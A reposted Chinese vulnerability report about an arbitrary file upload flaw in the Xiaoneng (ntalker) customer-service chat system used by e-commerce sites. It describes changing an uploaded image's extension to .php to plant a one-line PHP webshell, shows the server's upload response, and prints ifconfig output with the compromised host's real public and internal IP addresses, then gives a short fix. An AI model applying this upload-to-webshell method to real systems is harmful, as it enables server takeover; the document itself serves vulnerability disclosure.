小能在线客服系统可聊天可getshell(多家电商使用)

客服MM一定要警惕那些不说话给你发图片或文件的银。

小能创立于2007年底,由来自微软、盛大等知名IT公司的高管创办,并先后为超过15000多家中国的互联网和电商公司提供产品和服务。2013年底,公司获得国际知名风险投资公司的投资。

1.任意文件上传漏洞,可GETSHELL

在某网站上瞎逛看到有个客服在线,客服系统一般都提供发图片或者截图的功能,试了下韩都衣舍,看图:

小能在线客服系统可聊天可getshell(多家电商使用)

随便传了个图片过去,返回请求包如下:

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Thu, 21 Aug 2014 05:24:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.2.10 Content-Length: 437 {"type":2,"msg":"???è????????","url":"http://t2d.ntalker.com/func/imagetrans/image.php?f=YWFhLnBuZw==&q=L2ltYWdlc2F2ZS90ZW1wL2tmXzk4MTcvZWI5ZmNhZmNlMmYxOTNlNzM2YzBmNjBmMjk1YjgzODAxNDA4NTk4Njc2LnBuZw==","oldfile":"aaa.png","size":"4.36 KB","extension":"png","sourceurl":"http://t2d.ntalker.com/func/imagetrans/download.php?f=YWFhLnBuZw==&q=L2ltYWdlc2F2ZS90ZW1wL2tmXzk4MTcvZWI5ZmNhZmNlMmYxOTNlNzM2YzBmNjBmMjk1YjgzODAxNDA4NTk4Njc2LnBuZw=="}

URL被base64编码了: f=YWFhLnBuZw== //这是上传的文件名 q=L2ltYWdlc2F2ZS90ZW1wL2tmXzk4MTcvZWI5ZmNhZmNlMmYxOTNlNzM2YzBmNjBmMjk1YjgzODAxNDA4NTk4Njc2LnBuZw== //上传的路径 通过burpsuite将png图片后缀直接改成php,插入php一句话马后上传,获取到shell:

小能在线客服系统可聊天可getshell(多家电商使用)

内网。。。

[/home/www/t2d.ntalker.com/func/imagetrans/imagesave/temp/kf_1x/]$ /sbin/ifconfig em1 Link encap:Ethernet HWaddr 00:26:B9:5C:A5:1A inet addr:113.31.17.239 Bcast:113.31.17.255 Mask:255.255.255.224 inet6 addr: fe80::226:b9ff:fe5c:a51a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3766950309 errors:0 dropped:1 overruns:0 frame:0 TX packets:3438306797 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:564554700096 (525.7 GiB) TX bytes:1622506233974 (1.4 TiB) em2 Link encap:Ethernet HWaddr 00:26:B9:5C:A5:1B inet addr:192.168.1.190 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::226:b9ff:fe5c:a51b/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:373313383 errors:0 dropped:0 overruns:0 frame:0 TX packets:314958152 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:273620519884 (254.8 GiB) TX bytes:159373614381 (148.4 GiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:2799149950 errors:0 dropped:0 overruns:0 frame:0 TX packets:2799149950 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:1016538441687 (946.7 GiB) TX bytes:1016538441687 (946.7 GiB)

更多小伙伴看这:

http://www.xiaoneng.cn/partner.html

修复方案:

判断文件后缀名,设置图片目录不执行脚本权限。

分类:默认分类 时间:2015-03-12 人气:3
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.029 (s). 10 q(s)